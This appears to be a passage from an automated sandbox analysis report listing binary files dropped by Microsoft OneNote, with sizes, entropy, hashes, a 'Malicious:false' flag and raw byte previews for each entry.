                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.159214857120181
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:msG7rPd7nO7ROTqp/tjstAtMEPlORXk9nb1gToSrdQrSnZIIdXYzg7nO737aO7f5:msHOTqp/5jMEPsXk9KTXRIeu
                                                                                                                                                                                                              MD5:EA4C8B69E3D873182AA809D6244DF287
                                                                                                                                                                                                              SHA1:1B6B3EDCD2F7A81CAA351DB5EB59849DB7564105
                                                                                                                                                                                                              SHA-256:CF35D64B500C3D459CB54892C317F691ADD6972AEFE9628B8560B3ACB2338FE8
                                                                                                                                                                                                              SHA-512:7CC94699AB2F19BDECF550A7379C5960DAC9C9DE6D122E9D5C035D87F8439E8DF5CE38BC36B6A2A77BD6352616E42F24E4DB65CDD227D16E275FBD3520C35FDA
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......0...v...$.................................................?....?............................................................................2...>...........v...X............................I.......I.qk..B.....LZ.*i......*i^@....{....4.*i^@....{....4.*i..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..................<.7.&.X.K.....N...^.................N}.|.J..i;.Ovf........f........................................I.qk..B.....LZ.................<.7.&.X.K..............<.7.&.X.K...........*i......*i......*i..........................................*ij.....*iT.]...*i......*i..B...*iH.....*i..B...*i..>.).*i..J...................;........4...4...4.."...............*i..*i..*i..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........*i......*i....#.*i............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.127468922388431
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:psJuBoLAH+tQBWEBAC+rBgXrg9nXToArdSrLP9eIhdX3FcyfaRFNR:ps7AH+5EBA7KX09XTpRKb9RLXq
                                                                                                                                                                                                              MD5:FF5A05A37FC0D43AE5CA9DCC08D0E19A
                                                                                                                                                                                                              SHA1:B5A3500C62E2BC6A4E8A929A79AEECB34806F4D9
                                                                                                                                                                                                              SHA-256:95FD4B4DE2CD78948991B44E2E1E355B2583E55D385FD48CF8EC8D5AE08D6FC9
                                                                                                                                                                                                              SHA-512:A146C0C2C6A475E79D06EE79A9AC849ABCB87A261744F32F8C759427C4C09C6231271A798E5F87833E24B847AB960F8F69FA824EF7BB1E3FD8F430024FD1D575
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ .l..... .lNr...-d...... .lNr...-d...... .l..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............*...iK..2~X=Ze.q....N...^..................6..C.^.h..%........f........................................I.qk..B.....LZ............*...iK..2~X=Ze.q........*...iK..2~X=Ze.q......... .l..... .l..... .l......................................... .lj.... .lT.].. .l..... .l..B.. .lH.... .l..B.. .l..>.) .l..J...................;........4...4...4..".............. .l. .l. .l..z...y.. x.. ...........$........4......7...7........................;........4...4...4......... .l..... .l....# .l............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.093281951632501
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:viGBsFvVB6DM8E7lXs9CTKRKctVa/iEk:9sN6QZZXs9CWRKc
                                                                                                                                                                                                              MD5:E7A859B659FB1BEAB28ACF7ABCDA462C
                                                                                                                                                                                                              SHA1:027D60533640C7D2C6A9CBA03698C0470CD8E3C0
                                                                                                                                                                                                              SHA-256:44F67F18BCB3C9A2F2AEE4E7C184AAC2B2D33F9BD5BFD7535F9C9C59AFC596D9
                                                                                                                                                                                                              SHA-512:B1E000ABB84906F02FDF9470F07D21576455F806418F491DC0792236066C3A359083F99FF3FD55BE0EC64EE55D62DDBC6934D9F6ED4D39702462FB507D41EECE
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R.......................................K......0uFR.I.......I.qk..B.....LZ....K......0uFR.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............A...k....4.,......N...^...............R..*U.kB.=+v............f........................................I.qk..B.....LZ..............A...k....4.,............A...k....4.,..........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.09877784776967
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:9suDy9vI5tMOEEC/hXk9ngTolrdSrvIaF7dXOAXcn/sh:9sj9vI5hEEsXk9gT4RKB7tM/s
                                                                                                                                                                                                              MD5:C6715DC18562D66324B7DF71E4D38EA3
                                                                                                                                                                                                              SHA1:92B12AC81BB5A2B954260EEE2E9C268BAC229A22
                                                                                                                                                                                                              SHA-256:37185BCA16012511672DB7EFF667D412EBECCD5E70B4E608F653FFFDAF4CA733
                                                                                                                                                                                                              SHA-512:8A6548EC28BC0A059CCDA643E8C61719EEEB697925B358926D5FD5FAA356B5A045C4E247B9250ECE2E51028B1B2660838E3541CD5E4A93B24DD58D8664395ABB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ..............%.1.............%.1............I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............L....,w.LFr......N...^...............-+@..C.O.a..............f........................................I.qk..B.....LZ..............L....,w.LFr............L....,w.LFr..........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.075065799255672
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:FsjvTMUvTcvTMlA1iiE25X89jcTQRK2JvTcvTHvTdvTvvTVvTMlc:Fsj1AiAIPuX89jcMRK2JATBrZx
                                                                                                                                                                                                              MD5:422325F3D8AE0DAD6354A95F471A2F14
                                                                                                                                                                                                              SHA1:32D8443F11300ADB99A11D1D25C249184EB2F1D7
                                                                                                                                                                                                              SHA-256:E89C3AA790AF18C81F55EC798F0DA57593735281170C35428D6F7A06EBC2444D
                                                                                                                                                                                                              SHA-512:F9589F07014909581F29D6E53DEF04A11B4CC2269CECAEC397242BFE36486B499A3E861E482A17C6C9173CF3245DEDD04335352ACC85D37973072D1BE1997548
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ$.......$..Q_......7.+.$..Q_......7.+.$....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'..............f.M......x!Yy.$....N...^...............<e...H.M..=\.:2.........f........................................I.qk..B.....LZ.............f.M......x!Yy.$.........f.M......x!Yy.$.........$.......$.......$...........................................$..j....$..T.]..$.......$...B..$..H....$....B..$....>.)$....J...................;........4...4...4.."..............$...$...$....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........$.......$......#$..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.066620834925117
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:BoYsu1yZKYenWtI+EG9CCZvX89H/IrTobrdSrFIodXw0nIeY8rR:BoYsrIYeWlEifX89grTmRKZLc8r
                                                                                                                                                                                                              MD5:CF00C90F6F545B877026A4BE7197B052
                                                                                                                                                                                                              SHA1:19D7DE4E42E26961644F52967A8B3C8AE77B9FF5
                                                                                                                                                                                                              SHA-256:05AB8BD3E851735DE3369E16A16EF8FF12680DC26AFB1B71D59160A0331B4B24
                                                                                                                                                                                                              SHA-512:1C50DB3F3434EA4985A48E77F82DE002597350C31B25247E06A2C3EC18B28DDBDC89DA12B1D6EAF7245D927C290B37147345019608CFCEF1F5846EE53D764037
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.FL......FL.......P...c..FL.......P...c..FL..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............e...n...a..E0.....N...^...............e..e. .F.&.[.2..........f........................................I.qk..B.....LZ..............e...n...a..E0...........e...n...a..E0...........FL......FL......FL..........................................FLj.....FLT.]...FL......FL..B...FLH.....FL..B...FL..>.).FL..J...................;........4...4...4.."...............FL..FL..FL..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........FL......FL....#.FL............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.116922369928255
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:1sss5d579E1SKXFK9xTTRKSJ3ISW3Baw:1sv5WrX49xHRKS
                                                                                                                                                                                                              MD5:06DFD40630632857DD4B4089C83918F6
                                                                                                                                                                                                              SHA1:FA40906C5DF9BE4FFB4E2DAA36C9D4E7140B91A7
                                                                                                                                                                                                              SHA-256:35F9FE0F6E90FDFA050F232E71DE7F265F169BC20C0075184575ADFB029B1180
                                                                                                                                                                                                              SHA-512:7804E8611EBD5B745B014A49AA7B57A5D02DBE0B83A41A139658E816FDFA5AAA7F5B602E14D11D318674753AEF53BD91F057A8F8B049EA97FC9C6ED140D3D2CB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ..4.......4a>....s.&...]..4a>....s.&...]..4..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............c..G...@...m......N...^...............er..8..O......D&........f........................................I.qk..B.....LZ..............c..G...@...m............c..G...@...m.............4.......4.......4...........................................4j......4T.]....4.......4..B....4H......4..B....4..>.)..4..J...................;........4...4...4.."................4...4...4..z...y.. x.. ...........$........4......7...7........................;........4...4...4...........4.......4....#..4............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.105837325143466
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:2vTMsHgXmG2teNtwl+EmCK5X89vTxToKrdSrAII2dXhUm0B6BvmN/pj:GTMslxt4NEmXX89v9TXRKJs
                                                                                                                                                                                                              MD5:F563D3FEC3110F3F2CF0A4388FAB4499
                                                                                                                                                                                                              SHA1:E7AFA0B95644B968AF6CD73447FC2E0F1896072A
                                                                                                                                                                                                              SHA-256:483FA68F24CBEEE1A97C89BAC2B828978AF2EE38FC667A9A945DAA54903BC216
                                                                                                                                                                                                              SHA-512:8D1DB54585EF29F1CFC294DE4001D4EDB863872D2587A70A31D2B245ED8645EED5E1B3F976AE5652613BC23634A9464FD123B47A37079B4BD128752B08110D54
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ............e....h7.'..A....e....h7.'..A.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...................."&.aO......N...^...............K..f.Z.H......z.........f........................................I.qk..B.....LZ..................."&.aO................."&.aO..........................................................................j.......T.]..............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.07657314646393
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:K4s5pCTnIFtoOs8ElCC5gXA9DGxaTolrdSrKITedXe10QG7pkOx:K4sGzIFuOtElCLXA9DnTMRK2bl5
                                                                                                                                                                                                              MD5:6127379D4338A1336210574285BA4467
                                                                                                                                                                                                              SHA1:444DE125E19492C8B4881CCA616034D091D12A9C
                                                                                                                                                                                                              SHA-256:095BD651AC7FEC82A2073273F289F250434A8E6CED31E61483A5FA7E09FC7590
                                                                                                                                                                                                              SHA-512:125742705BD4B0954B36C97DEDE3AEBE72FDCF31253CAE884819D7F4F77C0D8EBD061272AEDC37040BC3FAF1FA845BFC5E86DA855851DAB473FDEBF92DE6C75C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZ.o.......o.:P....7.I...o.:P....7.I...o...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'................n.Z.......I$....N...^................<=..2QC.q.H4.]........f........................................I.qk..B.....LZ...............n.Z.......I$...........n.Z.......I$..........o.......o.......o...........................................o.j.....o.T.]...o.......o..B...o.H.....o...B...o...>.).o...J...................;........4...4...4.."...............o...o...o...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........o.......o.....#.o.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.129723906765099
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:KIssjeF9mNuzoE6c74dXod936E6T3RK4rejtnBt:Hsv988VDoX493637RK4
                                                                                                                                                                                                              MD5:5FD2F3B8BF1A31D998761362A09024A5
                                                                                                                                                                                                              SHA1:1837EE901C35CC3D9D40C43CCE0BA152EC952568
                                                                                                                                                                                                              SHA-256:6B527CDAD31EDA422DBAB91A02C3342CA779E2CAD2B65A318FB97BD9EEA6E202
                                                                                                                                                                                                              SHA-512:DB9AE07469E0CA4163894716956BCD79D0E32DA7AC66AAE98D76487452555B014D634D34E5FD9C42B0CA6A79BDB05B38FEBAF162BE5D4CF29B8BF1364BDEA1F3
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZ.......?..+.7.m.Q...?..+.7.m.Q.....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'...............F..|...9..F.Z.....N...^...............B..y.I.%x.+{.2........f........................................I.qk..B.....LZ..............F..|...9..F.Z...........F..|...9..F.Z.................................................................j.....T.]...........B...H.......B.....>.)...J...................;........4...4...4..".....................z...y.. x.. ...........$........4......7...7........................;........4...4...4....................#.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.124330466954773
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:Q1Cg7sx8E2dMFEPkWXlW9QDeToJRKg98L8F8i8I8L8OJ868:uCg7sx8E2zFXI9QDe0JRKg98L8F8i8IL
                                                                                                                                                                                                              MD5:0327E898020AE5A0C19636FD82D35FAB
                                                                                                                                                                                                              SHA1:43FA9525A31DD529E72829E666349623BC0388E9
                                                                                                                                                                                                              SHA-256:7EDA8193A29061E5A52D3F3C41DEF3B19E19F537092E97C1136053C478351FB2
                                                                                                                                                                                                              SHA-512:4DAAF2BD2592F046F4BF718238D7A26CE39B862CA21D464058524EB48839A17AB5327D111C10AC4B9569F1C1390F050CA232E1F5F44DF8ADA2AFAC8C0107881F
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>...........v..."...................................................................................................................................2...>...........v...V............................I.......I.qk..B.....LZ.I^......I^...>........N.I^...>........N.I^..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............3..3.....B.^.......N...^...............$2.....K....T...........f........................................I.qk..B.....LZ............3..3.....B.^...........3..3.....B.^.............I^......I^......I^..........................................I^j.....I^T.]...I^......I^..B...I^H.....I^..B...I^..>.).I^..J...................;........4...4...4.."...............I^..I^..I^..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........I^......I^....#.I^............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.163366622102169
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:f/ZswnIBp0tiReEVC/ZLXsL9RB9dvTogrdSriIVdX7hYz4cxwU:f/ZsnBp0ZEVAXg9n9VTZRKJoT
                                                                                                                                                                                                              MD5:E08A2458A868C64D5FD10E9ACAA041FF
                                                                                                                                                                                                              SHA1:C11067296F9CB822458955F1A83F3EEE67C3D84F
                                                                                                                                                                                                              SHA-256:EF04D708F1843508B5B0F80EC50675F9C0B36EAA8ABE5AE1724D5687CB6C7383
                                                                                                                                                                                                              SHA-512:539AB4155D8A78BABD7998558AE12E55098B5A68D6594F02556799D36B6E3DB077717AF03AD294BB170487C3053CB640E9EB621AF85C042595D532EE72E9DA1C
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZR.......R..?U./.$..>. .pR..?U./.$..>. .pR....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............3/.N.]...+..j..~....N...^...............h.^...A......I.........f........................................I.qk..B.....LZ............3/.N.]...+..j..~........3/.N.]...+..j..~.........R.......R.......R...........................................R..j....R..T.]..R.......R....B..R..H....R....B..R....>.)R....J...................;........4...4...4.."..............R...R...R....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........R.......R......#R..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.127595794230619
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:1sqpbz1/2dMt+B6EsWCjtAX49H1To6rdSrhIHdXdwxEzv6/V:1sndMBEsWM6X49VTfRK+sYK
                                                                                                                                                                                                              MD5:55FBC84CB0CE1BC9B9F23785CD0D0914
                                                                                                                                                                                                              SHA1:BB68DD568B43C4E1D79AA3E6A93D63A495DE8CD4
                                                                                                                                                                                                              SHA-256:E2C233A2524D5EF0AE5BA2D5749C6DEF2BAD65FE1CC0094D7885047E86948CA2
                                                                                                                                                                                                              SHA-512:5BEEEE4B7D0C68CE98436881B98409787DBA807242423F51CE050E1BF12DC7C5793BCA646A4B452915C0EC2535B2B0278FC833E27E988371AF24A7CC6198F9A7
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZ.>.......>..9....]fq.....>..9....]fq.....>...I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............mH^.................N...^...............JAz...O....-...........f........................................I.qk..B.....LZ............mH^.....................mH^.......................>.......>.......>...........................................>.j.....>.T.]...>.......>...B...>.H.....>...B...>...>.).>...J...................;........4...4...4.."...............>...>...>...z...y.. x.. ...........$........4......7...7........................;........4...4...4..........>.......>.....#.>.............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.123987105471665
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:dsHIO6KiOxZER3ceBX8B9r7OT2RKgPOXYfN7:dsHIOWOsxHX49rCSRKgPOXYfN
                                                                                                                                                                                                              MD5:93A0A991E9B32FC394BC03E27F1FE64C
                                                                                                                                                                                                              SHA1:9AD2A53D991055AC963064BFB4D67A994E413A86
                                                                                                                                                                                                              SHA-256:1B755438A663A98EE922B72D22FD547433C1D6583B534DF48D232B03E41BDB81
                                                                                                                                                                                                              SHA-512:8F2C7770B05A79F37A29136740113E4914B8B6FFEB0E5E20FB2D31547F879387D8FCCE3D930D357C6CDDCF8870ED8A5770DBF7B5E73F8236D7E6B11DD670A9FB
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZk.......k..[......3...>.k..[......3...>.k....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.............9...".R.:$..V.......N...^..................T(..F..$...#........f........................................I.qk..B.....LZ............9...".R.:$..V...........9...".R.:$..V............k.......k.......k...........................................k..j....k..T.]..k.......k....B..k..H....k....B..k....>.)k....J...................;........4...4...4.."..............k...k...k....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........k.......k......#k..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.136310870891384
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:lsxW8gomiENA1s2jXM9k3TwRKsfYeB0l:lsw8gJPyjXM9w8RKsQ
                                                                                                                                                                                                              MD5:13EBA19571C81E7F1FCB434B7697BB68
                                                                                                                                                                                                              SHA1:D98558758A44C57A51B54CCE22D74C8ED80789E8
                                                                                                                                                                                                              SHA-256:74589B31E9EFB47FFB989F1AA8175591C8C43AF799F5FE0CD62DA0F8534CEC5A
                                                                                                                                                                                                              SHA-512:1BD8B696257C4EB386FE19A8C9BA70EE9D473D8FCE06F65B1C8C3A9956CDD33AF4A15AEA509BBFEB39F0D21B479C31E8AF08E1EF3637851B4A4C920EA557B654
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......*...v.......................................................................................................................................2...>...........v...R............................I.......I.qk..B.....LZQ.......Q..6.>>.7]......Q..6.>>.7]......Q....I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.....................o....m]....N...^................j..|P@..{CF.V.........f........................................I.qk..B.....LZ....................o....m]................o....m].........Q.......Q.......Q...........................................Q..j....Q..T.]..Q.......Q...B..Q..H....Q....B..Q....>.)Q....J...................;........4...4...4.."..............Q...Q...Q....z...y.. x.. ...........$........4......7...7........................;........4...4...4.........Q.......Q......#Q..............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.077246154430585
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:KOs0sCzcCuu8to1JqEyrCQpcXbc9Q2wNeTonrdSrDdIMdX0N0QQOC/R:KD0sPCuu8aGEyreXY9Q2rT+RKJvl
                                                                                                                                                                                                              MD5:4C2BC3C07B314BB68521163BB39B7F0A
                                                                                                                                                                                                              SHA1:E88156D9131AB3C3B6F1EA92DE084C995BDE3C68
                                                                                                                                                                                                              SHA-256:3F10D627737E25AD0BE58B1C8E55B6A0BFD03215B974073AA61787175F648B50
                                                                                                                                                                                                              SHA-512:E419B665A69D45BB058EEDFD3AE7D2FDD5D11F6CD254ACC678317E379BD748C6BCB70E17617D79FF00CBA9887FF86ECEE1FFF65524D702A8E9003F1A14D06EA5
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......,...v... ...................................................................................................................................2...>...........v...T............................I.......I.qk..B.....LZ............z.....e......z.....e.......I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'.....................4..$.$E.....N...^..................M...M.?JAc~..........f........................................I.qk..B.....LZ....................4..$.$E.................4..$.$E.........................................................................j.......T.]...............B.....H.........B.......>.).....J...................;........4...4...4.."...........................z...y.. x.. ...........$........4......7...7........................;........4...4...4........................#...............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):4096
                                                                                                                                                                                                              Entropy (8bit):4.1508431357635445
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:48:vsSdcv29tgAsEJlCDMXHW9HGsJqx516TovrdSrNI0dXgB6mabf4xf:vsBv29yZEX1X29mswL16TGRKhdB4x
                                                                                                                                                                                                              MD5:9A56F9BBE1294283EF2752338A5EFB81
                                                                                                                                                                                                              SHA1:F50BDBB1D307345CA43481ED9BC32BC2436BDF83
                                                                                                                                                                                                              SHA-256:FEC0D1868BF3FCF4A36F1B6FD38972931A6F62496FBC12B04C7F8CAAD7255C76
                                                                                                                                                                                                              SHA-512:61A940CD12E2B22983432C74EDB0A9EB067861A6FBE8D33BF3F67CA835C7EC661F8C9E73DF6F9DC0DB71933B657C67A040C0769999C07AA1CFDA16BDA47C25CD
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:2...>.......(...v.......................................................................................................................................2...>...........v...P............................I.......I.qk..B.....LZ.i......i..o.......c...i..o.......c...i..I.qk..B.....LZ.I................................I.......I...................................................I.t.....I................................................................4..'...'............. ...r..,..`.|.[....N...^................?.....J..h.7..........f........................................I.qk..B.....LZ............ ...r..,..`.|.[........ ...r..,..`.|.[..........i......i......i..........................................ij.....iT.]...i......i..B...iH.....i..B...i..>.).i..J...................;........4...4...4.."...............i..i..i..z...y.. x.. ...........$........4......7...7........................;........4...4...4..........i......i....#.i............................................
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):8192
                                                                                                                                                                                                              Entropy (8bit):3.5622838651192055
                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                              SSDEEP:96:LhAo0kXD3fWLCEqj8mEG4IaE1c4IQcleH4IC9DBY:pTuLqYDO31UJleXC
                                                                                                                                                                                                              MD5:C5165B09BD3CE18A9E77DE8A4B333FD9
                                                                                                                                                                                                              SHA1:08A0C7AF63CE637E62C9DDDE40EE30A9D5E045C7
                                                                                                                                                                                                              SHA-256:60B08430A2A49E03BE7634A804DEA32B52D70B40BF473122E3433800E3416BF6
                                                                                                                                                                                                              SHA-512:5114B785CF34E9F8B029E22B3A64F304B34E767A8822E5E744AAC270E248957516150B2F94A452D89638DE7DA67C1F79B8D78BEBFFF57150A3BAF8335D933287
                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                              Preview:\...L...............................................................................................?...................................................\...L...............,....................................Dm....L..@C..{8......{8...dB.~..../xJ......j|.+&..J...6W_l$7../Oa.E...6W_..e..A_..#.19#s.T.e............T.......T...................................................x.......x.Ai.J....W...T.......T.(....7......2...........^.......0...........{8....M...l...x.J.../....e.......{8.T./....MT.v....lT......xT)....T.......T..."...T...n../..T)O........l...../....c..,0...e...B4.$...........GP..A..}.....J....................{8...dB.~..../x{8.....N$..F.[.E......../..|].cH.8....{v/.......>................e..A_..#.19#s.T.'}^]...),..r.N./..|].cH.8....{...........0...........e....4.............."...P.r.o.j.e.c.t. .O.v.e.r.v.i.e.w.......B.^....F...r.QH.....(...........(..."...P.r.o.j.e.c.t. .O.v.e.r.v.i.e.w...j...P.a.g.e.L.o.c.I.D...L.o.c.V.e.r...P.a.g.e.V.e.r.C.o.m.m.e.n.t...P.a.g.e.O.v.e.
                                                                                                                                                                                                              Process:C:\Program Files\Microsoft Office\root\Office16\ONENOTE.EXE
                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                              Size (bytes):20480
                                                                                                                                                                                                              Entropy (8bit):4.61047709092048
                                                                                                                                                                                                              Encrypted:false
